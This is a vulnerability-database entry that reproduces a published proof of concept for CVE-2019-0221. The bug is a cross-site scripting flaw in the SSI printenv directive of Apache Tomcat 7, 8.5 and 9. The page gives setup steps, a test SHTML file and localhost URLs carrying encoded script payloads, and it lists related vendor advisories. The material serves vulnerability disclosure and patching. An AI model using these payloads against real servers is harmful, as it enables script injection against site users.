Apache Tomcat 9.0.0.M1 Cross Site Scripting

🗓️ 12 Jul 2021 00:00:00Reported by Central InfosecType

packetstorm🔗 packetstormsecurity.com👁 359 Views

CVE-2019-0221 Apache Tomcat 9.0.0.M1 Cross-Site Scripting (XSS

Reporter	Title	Published	Views	Family All 162
0day.today	Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS) Vulnerability	13 Jul 202100:00	–	zdt
IBM Security Bulletins	Security Bulletin: IBM WebSphere Cast Iron Solution & App Connect Professional is affected by Apache Tomcat vulnerabilities.	10 Jan 202007:16	–	ibm
IBM Security Bulletins	Security Bulletin: Open Source Apache Tomcat vulnerabilities affect IBM Tivoli Application Dependency Discovery Manager (TADDM) (CVE-2019-0232, CVE-2019-0221)	13 Jan 202012:45	–	ibm
IBM Security Bulletins	Security Bulletin: Security vulnerability in Apache Tomcat affects multiple IBM Rational products based on IBM's Jazz technology	28 Apr 202118:35	–	ibm
IBM Security Bulletins	Security Bulletin: Security vulnerability has been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2019-0221)	19 Jun 201919:35	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple Vulnerabilities in IBM Guardium Data Encryption (GDE)	24 Aug 202010:03	–	ibm
Tenable Nessus	Apache Tomcat 9.0.x < 9.0.19 Remote Code Execution Vulnerability (Windows)	13 May 201900:00	–	nessus
Tenable Nessus	Amazon Linux 2 : tomcat (ALAS-2023-2200)	14 Aug 202300:00	–	nessus
Tenable Nessus	Amazon Linux 2 : tomcat (ALASTOMCAT8.5-2023-014)	27 Sep 202300:00	–	nessus
Tenable Nessus	Amazon Linux AMI : tomcat8 (ALAS-2019-1234)	26 Jul 201900:00	–	nessus

`# Exploit Title: Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)  
# Date: 05/21/2019  
# Exploit Author: Central InfoSec  
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93  
# CVE : CVE-2019-0221  
  
# Requirements:  
  
# SSI support must be enabled within Apache Tomcat. SSI support is not enabled by default.  
  
# A file (usually "*.shtml") with the "printenv" SSI directive must exist within the web application.  
  
# The file must be accessible.  
  
  
  
# Proof of Concept:  
  
# Install a Java Runtime Environment (JRE)  
  
# Download a vulnerable version of Tomcat and extract the contents  
  
# Modify line 19 of the conf\context.xml file to globally enable privileged context  
Context privileged="true">  
  
# Modify conf\web.xml to enable the SSI Servlet as per the Apache Tomcat User Guide  
  
# Put the following code in "webapps/ROOT/ssi/printenv.shtml"  
<html>  
<body>  
Echo: <!-- #echo var="QUERY_STRING_UNESCAPED" --> <br/> <br/>  
Printenv: <!-- #printenv -->  
</body>  
</html>  
  
# Run Tomcat  
cd bin  
catalina run  
  
# Call the following URLs to observe the XSS. You may need to use FireFox. Observe the difference between the "echo" directive which escapes properly and the "printenv" directive which does not escape properly  
http://localhost:8080/ssi/printenv.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EXSS%3C/h1%3E%3Cbr/%3E%3Cbr/%3E  
http://localhost:8080/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E  
`

12 Jul 2021 00:00Current

7High risk

Vulners AI Score7

EPSS0.14481